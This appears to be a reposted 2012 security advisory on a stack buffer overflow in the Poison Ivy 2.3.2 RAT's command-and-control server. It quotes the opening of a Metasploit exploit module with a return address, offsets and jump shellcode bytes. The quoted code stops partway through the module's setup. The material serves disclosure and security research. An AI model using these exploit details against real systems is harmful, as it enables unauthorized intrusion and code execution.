Poison Ivy C&C Server Buffer Overflow Vulnerability

Published: 2012-07-06
Updated: 2012-07-09

Affected systems:
Poison Ivy 2.3.2
Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 54339

Poison Ivy is a remote administration tool (RAT).

Poison Ivy 2.3.2 contains a stack buffer overflow in its command-and-control (C&C) server. An attacker can exploit this vulnerability to execute arbitrary code in the context of the affected application.

<*Source: Metasploit *>

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users assume all risk!

Metasploit provides the following test method:


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

    include Msf::Exploit::Remote::Tcp
    include Msf::Exploit::Brute

    def initialize(info = {})
        super(update_info(info,
            'Name'           => "Poison Ivy 2.3.2 C&C Server Buffer Overflow",
            'Description'    => %q{
                This module exploits a stack buffer overflow in Poison Ivy 2.3.2 C&C server.
                The exploit does not need to know the password chosen for the bot/server
                communication. If the C&C is configured with the default 'admin' password,
                the exploit should work fine. In case of the C&C configured with another
                password the exploit can fail. The 'check' command can be used to determine
                if the C&C target is using the default 'admin' password.

                Hopefully an exploit try won't crash the Poison Ivy C&C process, just the thread
                responsible of handling the connection. Because of this the module provides the
                RANDHEADER option and a bruteforce target. If RANDHEADER is used a random header
                will be used. If the bruteforce target is selected, a random header will be sent in
                case the default for the password 'admin' doesn't work. Bruteforce will stop after
                5 tries or a session obtained.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'Andrzej Dereszowski', # Vulnerability Discovery
                    'Gal Badishi',         # Exploit and Metasploit module
                    'juan vazquez'         # Testing and little of Metasploit-fu
                ],
            'References'     =>
                [
                    [ 'URL', 'http://www.signal11.eu/en/research/articles/targeted_2010.pdf' ],
                    [ 'URL', 'http://badishi.com/own-and-you-shall-be-owned' ]
                ],
            'DisclosureDate' => "Jun 24 2012",
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'thread',
                },
            'Payload'        =>
                {
                    'StackAdjustment'   => -4000,
                    'Space'             => 10000,
                    'BadChars'          => "",
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Poison Ivy 2.3.2 / Windows XP SP3 / Windows 7 SP1',
                        {
                            'Ret'           => 0x0041AA97, # jmp esp from "Poison Ivy 2.3.2.exe"
                            'RWAddress'     => 0x00401000,
                            'Offset'        => 0x806D,
                            'PayloadOffset' => 0x75,
                            'jmpPayload'    => "\x81\xec\x00\x80\x00\x00\xff\xe4" # sub esp,0x8000 # jmp esp
                        }
                    ],
                    [ 'Poison Ivy 2.3.2 - Bruteforce / Windows XP SP3 / Windows 7 SP1',
                        {
                            'Ret'           => 0x0041AA97, # jmp esp from "Poison Ivy 2.3.2.exe"
                            'RWAddress'     => 0x00401000,
                            'Offset'        => 0x806D,
                            'PayloadOffset' => 0x75,
                            'jmpPayload'    => "\x81\xec\x00\x80\x00\x00\xff\xe4", # sub esp,0x8000 # jmp esp
                            'Bruteforce'    =>
                                {
                                    'Start' => { 'Try' => 1 },
                                    'Stop'  => { 'Try' => 6 },
                                    'Step'  => 1,
                                    'Delay' => 2
                                }
                        }
                    ],
                ],
            'DefaultTarget'  => 0
        ))


Reprints must cite the source: https://www.heiqu.com/wwyffg.html